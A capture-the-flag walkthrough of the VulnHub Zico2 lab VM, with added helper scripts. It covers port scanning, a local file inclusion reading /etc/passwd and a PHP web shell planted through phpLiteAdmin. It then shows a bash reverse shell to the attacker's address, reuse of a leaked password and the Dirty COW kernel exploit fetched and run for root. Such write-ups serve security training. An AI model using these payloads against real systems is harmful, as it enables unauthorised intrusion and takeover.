Preface
⏰ Date: 2023.7.29
🗺️ Target VM: https://www.vulnhub.com/entry/zico2-1,210/
⚠️ Everything in this post was done against the VM in a lab network; never use it against real systems without authorization.
🙏 My skills are limited, corrections are welcome, and thank you for reading!
🎉 Feel free to follow 🔍, like 👍, bookmark ⭐️ and comment 📝
Information gathering
Host discovery with nmap
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:02 HKT
Nmap scan report for 192.168.58.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.162
Host is up (0.00024s latency).
MAC Address: 00:0C:29:70:7C:17 (VMware)
The target is 192.168.58.162.
Store the target address in a variable.
Fast port discovery with masscan
┌──(root㉿kali)-[~]
└─# export T=192.168.58.162
┌──(root㉿kali)-[~]
└─# masscan --rate=100000 -p 1-65535 $T
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-29 02:04:23 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 111/tcp on 192.168.58.162
Discovered open port 80/tcp on 192.168.58.162
Discovered open port 22/tcp on 192.168.58.162
Discovered open port 48546/tcp on 192.168.58.162
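Copying the four ports from masscan into nmap by hand is fine here, but the same step repeats on every box. The helper below is an added example, not part of the original write-up: it parses masscan's "Discovered open port" lines into the comma-separated list that nmap -p takes, and scan_target chains the two tools. The sample masscan lines are constructed to match the output above; the file name masscan-$T.txt is my own choice.

```shell
#!/bin/sh
# Added example: turn masscan output into an nmap -p port list.

# Read masscan output on stdin; print open TCP ports as "22,80,111,48546".
# Status lines ("Starting masscan", "Initiating ...") do not match and are dropped.
masscan_ports() {
  sed -n 's/^Discovered open port \([0-9][0-9]*\)\/tcp on .*/\1/p' \
    | sort -n -u \
    | paste -s -d , -
}

# Full pipeline against one target: masscan for speed, nmap -A only on what is open.
# Both tools need root; the rate is the one used in the write-up.
scan_target() {
  T="$1"
  masscan --rate=100000 -p 1-65535 "$T" | tee "masscan-$T.txt"
  ports=$(masscan_ports < "masscan-$T.txt")
  [ -n "$ports" ] || { echo "no open TCP ports found on $T" >&2; return 1; }
  nmap -A -p "$ports" "$T"
}

# Constructed sample of masscan output (same ports the scan above found).
SAMPLE_MASSCAN='Discovered open port 111/tcp on 192.168.58.162
Discovered open port 80/tcp on 192.168.58.162
Discovered open port 22/tcp on 192.168.58.162
Discovered open port 48546/tcp on 192.168.58.162'

printf '%s\n' "$SAMPLE_MASSCAN" | masscan_ports   # prints 22,80,111,48546
```

masscan emits only what it sees during a single fast SYN sweep, so a port missed by packet loss at 100k pps never reaches nmap; on a lossy link lower the rate or run masscan twice and merge the files.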
Service and version probing with nmap
┌──(root㉿kali)-[~]
└─# nmap -A -p 22,80,111,48546 $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:06 HKT
Nmap scan report for 192.168.58.162
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39109/tcp6 status
| 100024 1 45393/udp status
| 100024 1 47475/udp6 status
|_ 100024 1 48546/tcp status
48546/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:70:7C:17 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
For convenience, add a hosts entry for the site on port 80:
echo '192.168.58.162 t' | tee -a /etc/hosts
The site can then be reached at http://t/.
Scanning with AWVS
AWVS flags a local file inclusion in the page parameter of view.php; a traversal path to /etc/passwd confirms it:
┌──(root㉿kali)-[~]
└─# curl http://t/view.php?page=../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
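The fourteen ../ segments in the request above are more than the file system needs: once the path reaches /, further .. stay at /, so an over-long chain is harmless and saves guessing the depth. The script below is an added example (not from the original write-up) that probes a parameter the other way round, starting shallow and walking deeper until /etc/passwd comes back, which also tells you where the including script lives. The URL and parameter name are arguments; the sample response body is constructed.

```shell
#!/bin/sh
# Added example: probe a GET parameter for directory traversal / LFI.

# Build a traversal payload with N "../" segments in front of a target file.
traversal() {
  n="$1"; target="$2"; p=""
  while [ "$n" -gt 0 ]; do p="$p../"; n=$((n - 1)); done
  printf '%s%s\n' "$p" "$target"
}

# Does a response body (stdin) look like /etc/passwd? Check for the root entry.
looks_like_passwd() {
  grep -q '^root:x:0:0:'
}

# Try depths 1..12; print the first payload that returns /etc/passwd.
# Usage: probe_lfi 'http://t/view.php' page
probe_lfi() {
  url="$1"; param="$2"; depth=1
  while [ "$depth" -le 12 ]; do
    payload=$(traversal "$depth" etc/passwd)
    # --data-urlencode percent-encodes the slashes; PHP decodes them again.
    if curl -s -G --data-urlencode "$param=$payload" "$url" | looks_like_passwd; then
      echo "LFI confirmed at depth $depth: $url?$param=$payload"
      return 0
    fi
    depth=$((depth + 1))
  done
  echo "no traversal hit on $url ($param)" >&2
  return 1
}

# Constructed response body, used to exercise looks_like_passwd offline.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
zico:x:1000:1000:,,,:/home/zico:/bin/bash'
```

If the application appends a suffix such as .php to the parameter before including it, this plain probe finds nothing even though the inclusion exists; view.php on this box includes the raw value, which is why /etc/passwd comes back unchanged.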
The scan also turns up a phpLiteAdmin login page.
Writing a shell through phpLiteAdmin
The password admin logs you straight in.
Under Create New Database, enter haha.php and click Create.
Click haha.php under Change Database to switch to it.
Create a table.
In Default Value, enter:
<?php system($_GET[cmd]);?>
Then open Insert and click Insert.
The SQLite file is now named haha.php and carries the PHP tag inside it. When the web server parses that file, the binary SQLite header is echoed back as garbage, but the <?php block still runs, so commands can be executed through the cmd parameter.
Reverse shell
nc -e is not available on the target.
Use a bash reverse shell instead, with a listener waiting on 192.168.58.153:5555:
bash -c 'bash -i >& /dev/tcp/192.168.58.153/5555 0>&1'
URL-encode it before putting it in the cmd parameter.
Moving to zico
Look around the home directory.
wp-config.php under the wordpress directory holds a database password:
sWfCsfJSPV9H3AmQzw8. Try it to switch to the zico user, in case the password is reused.
su needs a proper tty, so first upgrade the shell with python:
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation with Dirty COW
Exploit: https://www.exploit-db.com/exploits/40839 (CVE-2016-5195)
uname -a                                   # check the kernel version against the Dirty COW range
cd /tmp
wget http://192.168.58.153:3333/dirty.c    # fetch the exploit from an HTTP server on the attacker
gcc -pthread dirty.c -o exp -lcrypt        # build flags from the exploit's own header
chmod 777 exp                              # make it executable
./exp 123456                               # writes a root user "firefart" with password 123456 into /etc/passwd
su firefart
ls /root
cat /root/flag.txt
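The write-up checks uname -a by eye before compiling. The script below is an added example, not part of the original post or of exploit 40839: a small version check that says whether the kernel is even in the range where Dirty COW existed, and a wrapper that builds and runs the exploit the way the post does and reminds you to put /etc/passwd back, since 40839 rewrites it and leaves the original in /tmp/passwd.bak. The version strings in the usage lines are constructed.

```shell
#!/bin/sh
# Added example: pre-flight version check and wrapper for the exploit-db 40839 build.

# Strip distro suffixes: "3.2.0-23-generic" -> "3.2.0"
kernel_base() {
  printf '%s\n' "$1" | sed 's/[^0-9.].*$//'
}

# True when dotted version $1 sorts numerically below $2 (three fields compared).
version_lt() {
  [ "$1" = "$2" ] && return 1
  first=$(printf '%s\n%s\n' "$1" "$2" | sort -t. -k1,1n -k2,2n -k3,3n | head -n 1)
  [ "$first" = "$1" ]
}

# CVE-2016-5195 has been present since 2.6.22 and was fixed upstream in 4.8.3
# (October 2016). Distributions backported that fix to older version numbers,
# so a hit here means "worth trying in the lab", not "vulnerable".
dirtycow_candidate() {
  v=$(kernel_base "$1")
  ! version_lt "$v" 2.6.22 && version_lt "$v" 4.8.3
}

# Build and run 40839 the way the write-up does. The exploit adds a root user
# "firefart" with password $1 to /etc/passwd and backs the original up to
# /tmp/passwd.bak; restore it once you are done.
run_dirtycow() {
  pw="$1"
  if ! dirtycow_candidate "$(uname -r)"; then
    echo "kernel $(uname -r) is outside the Dirty COW range, skipping" >&2
    return 1
  fi
  cd /tmp && gcc -pthread dirty.c -o exp -lcrypt && chmod +x exp && ./exp "$pw"
  echo "when finished: mv /tmp/passwd.bak /etc/passwd" >&2
}

# Usage on the target (constructed examples):
#   dirtycow_candidate 3.2.0-23-generic     # exit 0: in range
#   dirtycow_candidate 4.15.0-112-generic   # exit 1: fixed kernels
#   run_dirtycow 123456
```

The exploit races a writer thread against madvise(MADV_DONTNEED) and can leave the machine unstable; on a VM snapshot first, and always restore /etc/passwd so the box is not left with an extra root account.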